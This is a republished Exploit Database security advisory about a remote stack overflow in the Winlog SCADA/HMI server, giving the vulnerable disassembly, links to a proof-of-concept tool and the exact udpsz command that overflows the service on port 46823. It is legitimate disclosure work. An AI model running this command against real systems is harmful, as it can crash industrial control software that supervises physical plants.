Sielco Sistemi Winlog 2.07.00 – Stack Overflow

• Exploit Database
• 14 阅读

• 作者： Luigi Auriemma
  日期： 2011-01-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15992/

• Source: http://aluigi.org/adv/winlog_1-adv.txt
  
  #######################################################################
  
   Luigi Auriemma
  
  Application:Sielco Sistemi Winlog
  http://www.sielcosistemi.com/en/products/winlog_scada_hmi/
  Versions: <= 2.07.00
  Platforms:Windows
  Bug:stack overflow
  Exploitation: remote
  Date: 13 Jan 2011
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bug
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  From vendor's website:
  "Simple, flexible and economical, Winlog Pro is a SCADA/HMI software
  package for the supervision of industrial and civil plants."
  
  
  #######################################################################
  
  ======
  2) Bug
  ======
  
  
  This SCADA software can act as a TCP/IP server by enabling the specific
  "Run TCP/IP server" option available in the
  "Configuration->Options->TCP/IP" section of the project we want to run
  and Runtime.exe will listen on the TCP port 46823.
  
  The opcode 0x02 of the protocol is used for the handling of some
  strings received by the client and the calling of one of the
  _TCPIP_WriteNumValueFP, _TCPIP_WriteDigValueFP or _TCPIP_WriteStrValueFP
  functions depending by the type of data.
  
  They use all the same function starting from offset 00446795 for the
  parsing of the data and it's vulnerable to a stack overflow while
  copying the input data in a temporary buffer of about 60 bytes:
  
  00446795/$55PUSH EBP
  00446796|.8BECMOV EBP,ESP
  00446798|.83C4 C0 ADD ESP,-40
  0044679B|.53PUSH EBX
  0044679C|.56PUSH ESI
  0044679D|.57PUSH EDI
  0044679E|.8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
  004467A1|.8B5D 08 MOV EBX,DWORD PTR SS:[EBP+8]
  004467A4|.8BF8MOV EDI,EAX
  004467A6|.33C0XOR EAX,EAX
  004467A8|.56PUSH ESI
  004467A9|.83C9 FF OR ECX,FFFFFFFF
  004467AC|.F2:AE REPNE SCAS BYTE PTR ES:[EDI]; strlen
  004467AE|.F7D1NOT ECX
  004467B0|.2BF9SUB EDI,ECX
  004467B2|.8D75 C0 LEA ESI,DWORD PTR SS:[EBP-40]
  004467B5|.87F7XCHG EDI,ESI
  004467B7|.8BD1MOV EDX,ECX
  004467B9|.8BC7MOV EAX,EDI
  004467BB|.C1E9 02 SHR ECX,2
  004467BE|.F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]; memcpy
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip (udpsz.zip)
  
  udpsz -T -b a -C 020101 SERVER 46823 1000
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  Version 2.07.01.
  
  
  #######################################################################